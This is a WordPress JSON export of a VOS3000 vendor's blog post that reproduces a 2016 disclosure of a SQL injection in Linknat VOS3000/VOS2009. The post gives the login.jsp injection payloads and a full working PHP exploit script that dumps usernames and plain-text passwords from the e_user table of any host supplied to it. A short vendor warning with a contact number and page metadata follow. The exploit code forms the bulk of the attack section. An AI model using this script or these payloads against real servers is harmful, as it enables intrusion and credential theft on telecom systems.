{"id":44,"date":"2019-06-04T06:27:47","date_gmt":"2019-06-04T06:27:47","guid":{"rendered":"http:\/\/multahost.com\/blog\/?p=44"},"modified":"2026-03-10T02:25:47","modified_gmt":"2026-03-10T02:25:47","slug":"how-vos3000-get-hacked-by-sql-injection-script-prevent-hacking","status":"publish","type":"post","link":"https:\/\/multahost.com\/blog\/how-vos3000-get-hacked-by-sql-injection-script-prevent-hacking\/","title":{"rendered":"HOW VOS3000 Get Hacked by SQL Injection Script, prevent Hacking!"},"content":{"rendered":"\n<p><strong>Linknat VOS2009\/VOS3000 SQL injection<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p><em>From<\/em>: Osama Khalid &lt;osama () codinghazard com&gt;<br><em>Date<\/em>: Thu, 19 May 2016 16:52:54 +0500<br><\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<pre class=\"wp-block-preformatted\">A SQL injection was found in Linknat VOS3000\/VOS2009, a popular VoIP\nsoftswitch, that could allow remote attackers to gain access to the\ncredentials stored in plain-text.\n\nApplication: Linknat VOS3000\/VOS2009\nVersions Affected: 2.1.1.5, 2.1.1.8, 2.1.2.0\nVendor URL: <a rel=\"noreferrer noopener\" href=\"http:\/\/www.linknat.com\/\" target=\"_blank\">http:\/\/www.linknat.com\/<\/a>\nBug: SQLi (with DBA privileges)\nType: Remote\nResolution: Fixed, upgrade to 2.1.2.4 or 2.1.6.0 Clean Version\nReference: WooYun-2015-145458 -\n<a rel=\"noreferrer noopener nofollow\" href=\"http:\/\/www.wooyun.org\/bugs\/wooyun-2010-0145458\" target=\"_blank\">http:\/\/www.wooyun.org\/bugs\/wooyun-2010-0145458<\/a>\n\nThe SQLi reported is time-based blind. Since it is not an in-band SQLi, the\nresults can be gathered from the output of welcome.jsp during the same\nsession.\n\n(1st request)\n\nPOST    <a rel=\"noreferrer noopener\" href=\"http:\/\/target\/eng\/login.jsp\" target=\"_blank\">http:\/\/target\/eng\/login.jsp<\/a>\nPARAM   loginType=1\n        name=' union select 1,2,@@version,'hello',5,6#\n        pass=' OR ''='\n\n(2nd request during the same session)\n\nGET     <a rel=\"noreferrer noopener\" href=\"http:\/\/target\/eng\/welcome.jsp\" target=\"_blank\">http:\/\/target\/eng\/welcome.jsp<\/a>\nRESULT  0|' union select\n1,2,@@version,'hello',5,6#|1|5.0.51a-community|hello|0.00|0.00|\n\n[ EXPLOIT CODE ]\n\n&lt;?php\n#\n# Linknat VOS2009\/VOS3000 SQLi exploit\n#\n# DISCLAIMER: The exploit is to be used for educational purposes only\n#             The author would not be responsible for any misuse\n#\n# AUTHOR:     Osama Khalid\n# WEBSITE:    <a rel=\"noreferrer noopener\" href=\"http:\/\/www.codinghazard.com\/\" target=\"_blank\">http:\/\/www.codinghazard.com\/<\/a>\n# DATE:       19\/05\/2016\n# REF:        <a rel=\"noreferrer noopener\" href=\"http:\/\/www.wooyun.org\/bugs\/wooyun-2010-0145458\" target=\"_blank\">http:\/\/www.wooyun.org\/bugs\/wooyun-2010-0145458<\/a>\n\nif ($argc &lt; 2) {\n    banner();\n    usage();\n    exit;\n}\n\n$host         = $argv[1];\n$column_one   = isset($argv[2]) ? $argv[2] : \"loginname\";\n$column_two   = isset($argv[3]) ? $argv[3] : \"password\";\n$table        = isset($argv[4]) ? $argv[4] : \"e_user\";\n$other        = isset($argv[5]) ? $argv[5] : \"\";\n\nfunction banner() {\n    echo \"########################################\\n\";\n    echo \"#                                      #\\n\";\n    echo \"# Linknat VOS3000\/VOS2009 SQLi exploit #\\n\";\n    echo \"#                                      #\\n\";\n    echo \"#             Osama Khalid             #\\n\";\n    echo \"########### <a rel=\"noreferrer noopener\" href=\"http:\/\/codinghazard.com\" target=\"_blank\">codinghazard.com<\/a> ###########\\n\";\n}\n\nfunction usage() {\n    echo \"\\n\";\n    echo \"php vos3000.php [HOST]\\n\";\n    echo \"php vos3000.php 127.0.0.1\\n\";\n    echo \"php vos3000.php [HOST] [COL1] [COL2] [TABLE] [OTHER SQL]\\n\";\n    echo \"php vos3000.php 127.0.0.1 table_schema table_name\ninformation_schema.tables \\\"where table_schema = 'mysql'\\\"\n\\n\";\n}\n\nfunction curl($url, $post = array(), $cookies = null, $header = false) {\n    $curl = curl_init();\n    curl_setopt($curl, CURLOPT_URL, $url);\n    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);\n    curl_setopt($curl, CURLOPT_HEADER, $header);\n    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);\n    if ($cookies != null)\n        curl_setopt($curl, CURLOPT_COOKIE, $cookies);\n    if (count($post) > 0) {\n        foreach ( $post as $key => $value)\n            $post_items[] = $key . '=' . urlencode($value);\n        $post_string = implode('&amp;', $post_items);\n        curl_setopt($curl, CURLOPT_POST, 1);\n        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);\n    }\n    $data = curl_exec($curl);\n    curl_close($curl);\n    return $data;\n}\n\nfunction query($host, $query) {\n    $data = curl(\"<a rel=\"noreferrer noopener\" href=\"http:\/\/$host\/eng\/login.jsp%22\" target=\"_blank\">http:\/\/$host\/eng\/login.jsp\"<\/a>;, array(\n            \"loginType\" => 1,\n            \"name\" => \"' union \" . $query . \"#\",\n            \"pass\" => \"' OR ''='\"\n        ), null, true);\n    preg_match_all('|Set-Cookie: (.*);|U', $data, $matches);\n    $cookies = implode('; ', $matches[1]);\n    $data = curl(\"<a rel=\"noreferrer noopener\" href=\"http:\/\/$host\/eng\/welcome.jsp%22\" target=\"_blank\">http:\/\/$host\/eng\/welcome.jsp\"<\/a>;, array(), $cookies, false);\n    $parts = explode(\"|\", trim($data));\n\n    if (count($parts) &lt; 7)\n        return false;\n\n    return array($parts[3], $parts[4]);\n}\n\nfunction ascii_table($data) {\n    $keys = array_keys(end($data));\n    $wid = array_map('strlen', $keys);\n    foreach($data as $row) {\n        foreach(array_values($row) as $k => $v)\n            $wid[$k] = max($wid[$k], strlen($v));\n    }\n    foreach($wid as $k => $v) {\n        $fmt[$k] = \"%-{$v}s\";\n        $sep[$k] = str_repeat('-', $v);\n    }\n    $fmt = '| ' . implode(' | ', $fmt) . ' |';\n    $sep = '+-' . implode('-+-', $sep) . '-+';\n    $buf = array($sep, vsprintf($fmt, $keys), $sep);\n    foreach($data as $row) {\n        $buf[] = vsprintf($fmt, $row);\n        $buf[] = $sep;\n    }\n    return implode(\"\\n\", $buf);\n}\n\nbanner();\necho \"\\n\";\necho \"Target:    $host\\n\";\necho \"Column #1: $column_one\\n\";\necho \"Column #2: $column_two\\n\";\necho \"Table:     $table\\n\";\necho \"Other:     $other\\n\";\necho \"\\n\";\n\n$results = array();\n$count_result = query($host, \"SELECT 1,2,COUNT(*),4,5,6 FROM $table\n$other\");\nif ($count_result) {\n    $count = intval($count_result[0]);\n    echo \"Found $count rows...\\n\";\n\n    for ($i=0; $i&lt;$count; $i++) {\n        $q = \"SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table\n$other LIMIT \" . $i . \",1\";\n        $result = query($host, $q);\n        if ($result) {\n            echo \"R\" . ($i+1) . \"]\\t\" . $column_one . \" = \" .\nhex2bin($result[0]) . \", \" . $column_two . \" = \" . hex2bin($result[1]) .\n\"\\n\";\n        } else {\n            echo \"Error retrieving row \" . ($i+1) . \"\\n\";\n        }\n        $results[] = array($column_one => hex2bin($result[0]), $column_two\n=> hex2bin($result[1]));\n    }\n\n    if (count($results) > 0) {\n        echo \"\\n\\n\" . ascii_table($results) . \"\\n\";\n    }\n} else {\n    echo \"Error retrieving row count\";\n}\n\n?><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>From 2016 People using some sql injection soft wares to hack VOS3000, We have our own security system from that time, we updated our security system too strong now, my work focus was always for security for voip soft-switch. Most of the time i gave free advice or shared information as much possible free of cost. Still there are lots of dirty things running around, so please be careful always and know more. Otherwise you will never able to do good business ever. Now-a-days People using hidden scripts or malwares in VOS3000 Client software to hack VOS Server.<\/p>\n\n\n\n<p>For More Help Knock me in whatsapp: +8801911119966 &#8211; i will do help all the ways.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Linknat VOS2009\/VOS3000 SQL injection From: Osama Khalid &lt;osama () codinghazard com&gt;Date: Thu, 19 May 2016 16:52:54 +0500 A SQL injection was found in Linknat VOS3000\/VOS2009, a popular VoIP softswitch, that could allow remote attackers to gain access to the credentials stored in plain-text. Application: Linknat VOS3000\/VOS2009 Versions Affected: 2.1.1.5, 2.1.1.8, 2.1.2.0 Vendor URL: http:\/\/www.linknat.com\/ Bug: [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[978,979,556,560,3,2,724,565,566,572,611,628],"tags":[6,10,480,232,937,882,961,886,834,976,836,965,905,904,958,853,841,897,868,910,971,835,880,934,876,857,830,858,891,854,850,497,549,945,856,813,907,968,878,811,824,931,844,944,957,809,951,846,917,964,911,960,877,875,817,869,859,925,839,831,939,881,819,916,933,828,943,950,952,865,816,832,929,890,851,829,954,852,908,912,973,833,913,892,825,966,919,820,871,860,855,894,840,847,827,842,972,915,874,936,949,948,826,938,873,843,848,947,969,837,815,955,862,901,959,838,896,822,810,899,898,903,935,967,932,845,864,895,808,872,906,928,883,867,893,963,914,812,885,940,902,900,974,884,889,861,970,887,823,941,927,930,924,926,923,922,879,921,870,888,975,863,849,946,956,814,909,953,821,918,920,962,942,866,818],"class_list":["post-44","post","type-post","status-publish","format-standard","hentry","category-best-vos3000-server","category-centos7-server-for-vos3000","category-download-vos3000","category-emp-vos3000","category-voip-softswitch","category-vos3000","category-vos3000-2-1-8-05","category-vos3000-21907","category-vos3000-21907-download","category-vos3000-api","category-vos3000-download","category-vos3000-hacking","tag-vos3000","tag-vos3000-2-1-4-0","tag-vos3000-2-1-6-0","tag-vos3000-2-1-8-05","tag-vos3000-account-management","tag-vos3000-account-reports","tag-vos3000-admin-interface","tag-vos3000-administration-tools","tag-vos3000-alarm-system","tag-vos3000-alternative","tag-vos3000-anti-hack","tag-vos3000-api","tag-vos3000-api-documentation","tag-vos3000-api-integration","tag-vos3000-asr-acd","tag-vos3000-asr-analysis","tag-vos3000-auto-invoice","tag-vos3000-auto-restart","tag-vos3000-backup-solutions","tag-vos3000-billing","tag-vos3000-billing-integration","tag-vos3000-billing-portal","tag-vos3000-billing-reports","tag-vos3000-billing-system","tag-vos3000-business-voip-solutions","tag-vos3000-call-analytics","tag-vos3000-call-per-second","tag-vos3000-call-performance","tag-vos3000-call-quality","tag-vos3000-call-recording","tag-vos3000-call-routing","tag-vos3000-cards-management","tag-vos3000-carrier-solution","tag-vos3000-carrier-class","tag-vos3000-centralized-management","tag-vos3000-cheap-server","tag-vos3000-client","tag-vos3000-client-download","tag-vos3000-client-portal","tag-vos3000-cloud","tag-vos3000-concurrent-calls","tag-vos3000-configuration","tag-vos3000-custom-rates","tag-vos3000-data-query","tag-vos3000-ddos-protection","tag-vos3000-dedicated-server","tag-vos3000-demo","tag-vos3000-did-numbers","tag-vos3000-documentation","tag-vos3000-documentation-download","tag-vos3000-download","tag-vos3000-encryption","tag-vos3000-enterprise-grade","tag-vos3000-exchangerate-management","tag-vos3000-extreme-media-proxy","tag-vos3000-fax-support","tag-vos3000-feature-list","tag-vos3000-features","tag-vos3000-firewall-security","tag-vos3000-gateway-group","tag-vos3000-gateway-management","tag-vos3000-gateway-reports","tag-vos3000-global-card-system","tag-vos3000-guide","tag-vos3000-h323","tag-vos3000-h323-support","tag-vos3000-high-capacity","tag-vos3000-hosted-softswitch","tag-vos3000-hosted-solution","tag-vos3000-hosted-voip-softswitch","tag-vos3000-hosting","tag-vos3000-http-tcp-udp","tag-vos3000-installation","tag-vos3000-international-voip","tag-vos3000-ip-binding","tag-vos3000-ivr-management","tag-vos3000-lcr","tag-vos3000-lcr-routing","tag-vos3000-license","tag-vos3000-license-generator","tag-vos3000-linknat","tag-vos3000-load-balancing","tag-vos3000-manual","tag-vos3000-media-codec-settings","tag-vos3000-media-forwarding","tag-vos3000-media-proxy","tag-vos3000-mobile-management-manual","tag-vos3000-monthly-plan","tag-vos3000-mpbx-support","tag-vos3000-multi-gateway-encryption","tag-vos3000-multi-server","tag-vos3000-network-optimization","tag-vos3000-online-payment","tag-vos3000-online-sip-accounts","tag-vos3000-overload-protection","tag-vos3000-package-management","tag-vos3000-pbx","tag-vos3000-pdf","tag-vos3000-phone-card-business","tag-vos3000-phone-management","tag-vos3000-postpaid-billing","tag-vos3000-prepaid-billing","tag-vos3000-protocol-support","tag-vos3000-rate-management","tag-vos3000-rate-management-business","tag-vos3000-rate-table","tag-vos3000-real-time-monitoring","tag-vos3000-real-time-billing","tag-vos3000-redundancy","tag-vos3000-redundancy-backup","tag-vos3000-rent","tag-vos3000-reseller","tag-vos3000-reseller-services","tag-vos3000-sales-contacts","tag-vos3000-security","tag-vos3000-self-service-portal","tag-vos3000-server-monitoring","tag-vos3000-server-pricing","tag-vos3000-server-rent","tag-vos3000-server-support","tag-vos3000-server-update","tag-vos3000-service-agreement","tag-vos3000-setup","tag-vos3000-setup-guide","tag-vos3000-sip","tag-vos3000-sip-accounts","tag-vos3000-sip-codec-support","tag-vos3000-sip-message-settings","tag-vos3000-sip-trunking","tag-vos3000-sip-h323-hybrid","tag-vos3000-softswitch","tag-vos3000-softswitch-features","tag-vos3000-softswitch-platform","tag-vos3000-softswitch-security","tag-vos3000-status-dashboard","tag-vos3000-support","tag-vos3000-switch","tag-vos3000-switch-rental","tag-vos3000-system-features","tag-vos3000-system-management","tag-vos3000-system-requirements","tag-vos3000-technical-support","tag-vos3000-telecom","tag-vos3000-telecom-billing","tag-vos3000-telecom-carrier","tag-vos3000-telecom-solutions","tag-vos3000-traffic-monitoring","tag-vos3000-traffic-reports","tag-vos3000-uptime-sla","tag-vos3000-user-management","tag-vos3000-v2-1-1-5","tag-vos3000-v2-1-1-8","tag-vos3000-v2-1-2-0","tag-vos3000-v2-1-2-4","tag-vos3000-v2-1-2-6","tag-vos3000-v2-1-3-2","tag-vos3000-vendor-connections","tag-vos3000-version-2-1-9-07","tag-vos3000-video-calls","tag-vos3000-voip-billing-integration","tag-vos3000-voip-business","tag-vos3000-voip-business-platform","tag-vos3000-voip-offers","tag-vos3000-voip-platform","tag-vos3000-voip-server","tag-vos3000-voip-server-rent","tag-vos3000-voip-softswitch","tag-vos3000-voip-solution","tag-vos3000-voip-traffic","tag-vos3000-web-api","tag-vos3000-web-manual","tag-vos3000-web-portal","tag-vos3000-web-self-service","tag-vos3000-wholesale-voip","tag-vos3000-wireless-voip"],"acf":[],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":341,"url":"https:\/\/multahost.com\/blog\/vos3000_web_interface_developing_manual-web-api-vos3000-4\/","url_meta":{"origin":44,"position":0},"title":"API VOS3000 Web Interface Developing Easy Manual","author":"king","date":"October 16, 2019","format":false,"excerpt":"VOS3000 Web Interface Developing Easy Manual - API VOS3000","rel":"","context":"In &quot;VOS3000&quot;","block_context":{"text":"VOS3000","link":"https:\/\/multahost.com\/blog\/category\/vos3000\/"},"img":{"alt_text":"multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing","src":"https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":670,"url":"https:\/\/multahost.com\/blog\/vos3000-rental-server-in-china-hongkong-vietnam-many-countries\/","url_meta":{"origin":44,"position":1},"title":"VOS3000 Rental Server in China, HK, Vietnam &amp; More Countries at Best Price","author":"king","date":"September 27, 2025","format":false,"excerpt":"VOS3000 Rental Server in China, HongKong, Vietnam & Many Countries, you will get vos3000 rent so9lution from us at best price.","rel":"","context":"In &quot;VOS3000&quot;","block_context":{"text":"VOS3000","link":"https:\/\/multahost.com\/blog\/category\/vos3000\/"},"img":{"alt_text":"VOS3000-Offer, VOS3000 Price, VOS3000 rent, VOS3000 Hosting, VOS3000 installation, VOS3000 CentOS, VOS3000 Hosted, VOS3000 21907, VOS3000 Web, VOS3000 Softswitch, VOS3000 Keygen, VOS3000 Login, VOS3000 API, VOS3000 Anti Hack, VOS3000 21907, VOS3000 21907 Feature, VOS3000 2.1.6.00, client VOS3000, VOS3000 Server, VOS3000 Gateway, VOS3000 Server getting restarted, VOS3000 Installation, VOS3000 Server, VOS3000 SoftSwitch, VOS3000 Switch, VOS3000, VOS3000 Pricem VOS3000 Web, VOS3000 API, VOS3000 Rent, VOS3000 Manual, VOS3000 Downloads, VOS3000 VoIP, VOS3000 Carrier Switch, VOS3000, VOS3000 Login, VOS3000 Monitoring, VOS3000 Performance Metrics, VOS3000 Call Routing, VOS3000 Security, VOS3000 Web Manager, VOS3000 Versions, VOS3000 BillingVOS3000 Monitoring,VOS3000 Capacity, VOS3000 Billing System, VOS3000 License, Mobile Apps for VOS3000, VOS3000 Mobile Apps, Mobile Apps, VOS3000 Apps, Android VOS3000, VOS3000 in IOS, Manual for VOS3000, VOS3000 Manual, Manual VOS3000, Reference Manual VOS3000, User Manual VOS3000, CentOS7 Installation for VOS3000, Multiple IP License in VOS3000, VOS3000 License, License in VOS3000, vos installation, VOS3000 Hosting, Hosting VOS3000, VOS3000 Server Rent, VOS3000 Client Download, VOS3000 error codes, VOS3000 vs Asterisk, VOS3000 call center","src":"https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/VOS3000-Offer.png?fit=1200%2C800&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/VOS3000-Offer.png?fit=1200%2C800&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/VOS3000-Offer.png?fit=1200%2C800&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/VOS3000-Offer.png?fit=1200%2C800&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/VOS3000-Offer.png?fit=1200%2C800&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":339,"url":"https:\/\/multahost.com\/blog\/vos3000_web_interface_developing_manual-web-api-vos3000-3\/","url_meta":{"origin":44,"position":2},"title":"VOS3000_Web_Interface_Developing Best Easy Manual","author":"king","date":"October 16, 2019","format":false,"excerpt":"VOS3000_Web_Interface_Developing_Manual\/WEB API VOS3000, Know more about web api, VOS3000_Web_Interface_Developing Best Easy Manual","rel":"","context":"In &quot;VOS3000&quot;","block_context":{"text":"VOS3000","link":"https:\/\/multahost.com\/blog\/category\/vos3000\/"},"img":{"alt_text":"multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing","src":"https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":338,"url":"https:\/\/multahost.com\/blog\/vos3000_web_interface_developing_manual-web-api-vos3000-2\/","url_meta":{"origin":44,"position":3},"title":"VOS3000_Web_Interface_Developing_Manual\/WEB API VOS3000","author":"king","date":"October 16, 2019","format":false,"excerpt":"VOS3000_Web_Interface_Developing_Manual\/WEB API VOS3000 VOS3000_Web_Interface_Developing_Manual\/WEB API VOS3000 PDF Guide... https:\/\/multahost.com\/blog\/vos3000-price\/ https:\/\/multahost.com\/blog\/vos3000-chinese-guide\/ Visit Download link: https:\/\/www.vos3000.com\/downloads.php","rel":"","context":"In &quot;VOS3000&quot;","block_context":{"text":"VOS3000","link":"https:\/\/multahost.com\/blog\/category\/vos3000\/"},"img":{"alt_text":"vos3000 server, vos3000 server rent, vos3000 hosting, cheap vos3000 server, VOS3000 CDR Billing Discrepancy VOS3000 SIP Registration VOS3000 rate table, VOS3000 Licensed Version, VOS3000 Price, VOS3000 Licensed Version Price","src":"https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2026\/03\/vos3000-rent-english-server-vos3000-vos-server.png?fit=1200%2C800&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2026\/03\/vos3000-rent-english-server-vos3000-vos-server.png?fit=1200%2C800&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2026\/03\/vos3000-rent-english-server-vos3000-vos-server.png?fit=1200%2C800&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2026\/03\/vos3000-rent-english-server-vos3000-vos-server.png?fit=1200%2C800&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2026\/03\/vos3000-rent-english-server-vos3000-vos-server.png?fit=1200%2C800&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":488,"url":"https:\/\/multahost.com\/blog\/original-vos3000-web-module-with-vos3000-system-vos3000-2-1-8-05\/","url_meta":{"origin":44,"position":4},"title":"Original VOS3000 Web Module with VOS3000 System VOS3000 2.1.8.05","author":"king","date":"February 11, 2022","format":false,"excerpt":"Original VOS3000 Web Module with VOS3000 System VOS3000 2.1.8.05, know about Original Web Module by linknat","rel":"","context":"In &quot;VOS3000&quot;","block_context":{"text":"VOS3000","link":"https:\/\/multahost.com\/blog\/category\/vos3000\/"},"img":{"alt_text":"multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing","src":"https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":355,"url":"https:\/\/multahost.com\/blog\/noavailablerouter-error-in-vos3000-2-1-4-0-or-vos3000-2-1-6-0-in-termination-reason-2\/","url_meta":{"origin":44,"position":5},"title":"VOS3000 2.1.4.0 Common errors \u0985\u09a5\u09ac\u09be VOS3000 2.1.6.0 \u098f &#8220;\u09a8\u09cb\u0989\u09aa\u09b2\u09ad\u09cd\u09af \u09b0\u09be\u0989\u099f\u09be\u09b0&#8221; \u09a4\u09cd\u09b0\u09c1\u099f\u09bf &#8211; Complete Solution!","author":"king","date":"June 13, 2019","format":false,"excerpt":"VOS3000 2.1.4.0 Common errors \u098f \"\u09a8\u09cb\u0989\u09aa\u09b2\u09ad\u09cd\u09af \u09b0\u09be\u0989\u099f\u09be\u09b0\" \u09a4\u09cd\u09b0\u09c1\u099f\u09bf! But eto din fe;le vos3000 .vopm","rel":"","context":"In &quot;VOS3000&quot;","block_context":{"text":"VOS3000","link":"https:\/\/multahost.com\/blog\/category\/vos3000\/"},"img":{"alt_text":"multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing","src":"https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/multahost.com\/blog\/wp-content\/uploads\/2025\/09\/multahost-vos3000-server-banner.png?fit=1200%2C800&ssl=1&resize=1050%2C600 3x"},"classes":[]}],"jetpack_sharing_enabled":true,"jetpack_likes_enabled":true,"_links":{"self":[{"href":"https:\/\/multahost.com\/blog\/wp-json\/wp\/v2\/posts\/44","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/multahost.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/multahost.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/multahost.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/multahost.com\/blog\/wp-json\/wp\/v2\/comments?post=44"}],"version-history":[{"count":0,"href":"https:\/\/multahost.com\/blog\/wp-json\/wp\/v2\/posts\/44\/revisions"}],"wp:attachment":[{"href":"https:\/\/multahost.com\/blog\/wp-json\/wp\/v2\/media?parent=44"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/multahost.com\/blog\/wp-json\/wp\/v2\/categories?post=44"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/multahost.com\/blog\/wp-json\/wp\/v2\/tags?post=44"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}